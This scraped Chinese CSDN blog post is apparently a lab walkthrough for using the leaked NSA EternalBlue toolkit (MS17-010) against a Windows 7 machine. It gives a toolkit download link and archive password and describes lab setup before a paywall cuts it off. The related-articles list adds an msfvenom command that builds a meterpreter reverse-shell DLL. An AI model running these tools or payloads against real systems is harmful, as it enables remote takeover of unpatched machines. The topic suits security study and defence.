利用NSA方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)

最新推荐文章于 2024-09-30 22:39:11 发布
最新推荐文章于 2024-09-30 22:39:11 发布
阅读量1.9w 收藏 47
点赞数 7
分类专栏: wanan 文章标签: NSA 永恒之蓝
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38948797/article/details/79177880
版权
本文介绍了如何利用NSA的永恒之蓝漏洞工具攻陷一台Win7 64位系统,详细阐述了攻击步骤,包括在Kail Linux和Win2k3上的操作,以及通过Metasploit生成并植入dll后门,强调了系统升级和打补丁的重要性。
摘要由CSDN通过智能技术生成

利用方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)

 (注:本文章仅供技术交流和学习,请勿用于非法用途)

    相信17年最大的安全事件比特币勒索病毒Wanncary没几个人不知道吧。那么究竟比特币勒索病毒究竟是怎么一回事呢?所谓比特币勒索病毒即:永恒之蓝漏洞利用程序+Wannacry勒索软件程序,也正是这两个武器造就了迄今为止最巨大的网络攻击勒索事件,影响到近百个国家上千家企业及公共组织。

    然而比特币勒索病毒的核心武器也正是这个“永恒之蓝”,那什么又是“永恒之蓝”呢?这就说来话长了,先从一个黑客组织说起,这个黑客组织叫做Equation Group(方程式组织),据说方程式组织与美国国家安全局(NSA)的关系十分密切。而且外界也普遍认为,方程式组织就是美国国家安全局的一个下属部门,并一直效力于美国国家安全局。方程式组织这一黑客组织所拥有的技术无论是从复杂程度还是从其先进程度来看,都已经超越了世界上目前其他绝大多数的黑客团体,而且该黑客组织已经活跃了二十多年了。然而由方程式组织打造的一款名为“NSA方程式网络武器库”就在前不久由“The Shadow Brokers”(另外一个黑客组织)泄露了出来,而我们的“永恒之蓝”就包含在这个武器库中,于是比特币勒索病毒的发起者(有报道称是朝鲜的黑客组织,具体是不是我也不知道)成功利用该武器,并结合发起者打造的Wannacry勒索软件,于是乎就有了后面的比特币勒索事件的发生。所以重头戏完全在于这个“永恒之蓝漏洞利用程序”上,那么永恒之蓝这个漏洞利用程序究竟牛X到什么地步呢?这么说吧,除了windows10以外,windows系列的系统无一能够幸免。

NSA方程式工具下载:

Github下载地址https://github.com/misterch0c/shadowbroker

解压密码:Reeeeeeeeeeeeeee

  那么下面我将利用“永恒之蓝”攻陷一台Win764位的计算机。

 

攻击机

Kail linux :192.168.1.116

Win2k3  :192.168.1.102

靶机

Win7 x64:192.168.1.112(139、445端口开放状态)

(在win2K3上先装好Python运行环境:安装Python-2.6.6.msi、pywin32-221.win32-py2.6.exe)

 

第一步:在攻击机Win2k3上打开ShadowBrokers工具箱,进入C:\shadowbroker-master\windows

图一

第二步:修改windows文件夹下的Fuzzbunch.xml文件,将第19行和第24行路径进行覆盖,修改后的路径与当前路径一致.


<

最低0.47元/天 解锁文章
贪婪的念旧主义者936
关注
专栏目录
【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
做自己喜欢的事,并将其发挥到极致!
03-07 8544
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
永恒之蓝方程式利用工具使用教程
weixin_44400900的博客
11-07 1510
永恒之蓝方程式利用工具使用教程
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。方式可以直接打靶机,可以上传到跳板机执行。
第105篇:方程式工具包图形界面版V0.42,更新永恒浪漫exp对Vista、Win7系统的利用...
最新发布
ABC_123的博客
09-30 878
Part1 前言大家好,我是ABC_123。本期继续为大家分享我在2018年左右开始编写的,方程式工具包中各种Windows远程溢出漏洞的图形界面版。此次更新基于对美国NSA原版的方程式工具包命令行参数的新发现,优化多个参数,修复多处bug,增加“永恒浪漫”、“永恒冠军”的利用成功率,减少蓝屏现象的发生。注:方程式工具包的针对Windows系统的各种溢出漏洞,有很多使用技巧,所以我在制作图形界...
metaspolit工具利用(永恒之蓝)
weixin_41472455的博客
04-12 575
打开kali msfconsole //打开metaspolit控制台 search ms17-010 // 查找永痕之蓝漏洞 编号为(17-010) use auxiliary/sauxiliary/scanner/smb/smb_ms17_010 //使用辅助模块 (扫描模块) show options // ...
永恒之蓝实验工具.rar
07-19
最原始的利用版本
NSA方程式工具利用与分析
热门推荐
sherlly666的博客
04-24 2万+
NSA方程式工具利用与分析 NSA Eternalblue Windows漏洞 下载地址:https://yadi.sk/d/NJqzpqo_3GxZA4 解压密码:Reeeeeeeeeeeeeee github下载地址:https://github.com/misterch0c/shadowbroker释放的工具总共包含三个文件夹, Swift:包含了NSA对SWIFT银行系统发动攻击的相关证据,其
第89篇:方程式工具包远程溢出漏洞图形界面版V0.3(内置永恒之蓝、永恒冠军、永恒浪漫等)...
ABC_123的博客
03-09 750
Part1 前言大家好,我是ABC_123。我从年前到现在,一直在整理曾经写过的红队工具,逐步把自己认为比较好用的原创工具发出来给大家用一用,方便大家在日常的攻防比赛、红队评估项目中解放双手,节省时间精力和体力。本期给大家分享的就是我在2018年左右编写的方程式工具包的各种溢出漏洞的图形界面版,个人一直在更新,一直在用。注:方程式工具包的针对windows系统的各种溢出漏洞,有很多使用技巧,所...
漏洞复现(一):永恒之蓝ms17-010
weixin_47306547的博客
11-02 6789
目录 永恒之蓝简介 SMB协议 SMB原理 漏洞原理 漏洞危害 漏洞复现 实验环境 完整过程 扫描目标主机是否存在该漏洞 实施攻击 漏洞利用 漏洞防御 永恒之蓝简介 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、...
漏洞复现-永恒之蓝MS17-010
qq_60848021的博客
09-19 3079
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝工具,“永恒之蓝利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
网安永恒之蓝检测工具
04-02
总的来说,"网安永恒之蓝检测工具"是针对MS17-010漏洞的一款重要防御工具,它的存在帮助用户和管理员能够及时识别并修复可能被永恒之蓝利用的系统,从而提高网络安全防护能力。定期使用此类工具进行检测,可以有效...
永恒之蓝扫描工具ui版
11-15
图形化永恒之蓝 扫描工具,发现wannacry smb漏洞就, 安全工具
永恒之蓝检测工具.rar
10-16
永恒之蓝检测工具.rar
永恒之蓝免疫工具
10-08
永恒之蓝免疫工具.exe
永恒之蓝漏洞扫描工具官方版
08-06
可以批量扫描局域网内存在永恒之蓝漏洞的工具,比某安工具强大N倍
MS1710永恒之蓝漏洞利用
07-07
MS1710永恒之蓝漏洞利用
方程式工具包Linux,NSA工具包验证之SMB漏洞利用
weixin_31446915的博客
05-05 867
验证环境:攻击机1(本次演示IP:172.16.11.2):windows系统,安装python2.6.6, pywin32-221.win32-py2.6.exe, xshell, xftp, 下载方程式工具包放到C盘,在工具包目录下的windows目录新建文件夹”listeningposts”,并且开放所有端口关闭防火墙,确保内网可以访问之攻击机2(本次演示IP:172.16.12.2):ka...
永恒之蓝 利用(复现)
nszmsjhshs的博客
03-11 6615
永恒之蓝早在2017年4月15日黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝工具,“永恒之蓝”是利用Windows系统的SMB(445)漏洞可以跳过密码直接获取系统最高权限。这还没让我们对它得到重视,然而随后发生的一件事让它就此名声大噪或者说臭名昭著,那就是用它加以改造的wannacry 勒索病毒。它刚一出现就引起波然大动,全球各国都有地方受到攻击。被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支
探索永恒之蓝MS17-010漏洞利用工具推荐
gitblog_00187的博客
09-14 437
探索永恒之蓝MS17-010漏洞利用工具推荐 AutoBlue-MS17-010 项目地址: https://gitcode.com/gh_mirrors/au/AutoBlue-MS17-010 ...
永恒之蓝ms17-010
05-13
永恒之蓝(EternalBlue)是一个漏洞利用工具,用于攻击Windows操作系统中的MS17-010漏洞。该漏洞利用工具是由美国国家安全局(NSA)开发的,后来被黑客组织“影子经纪人”(Shadow Brokers)泄露。它被用于多次全球...
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值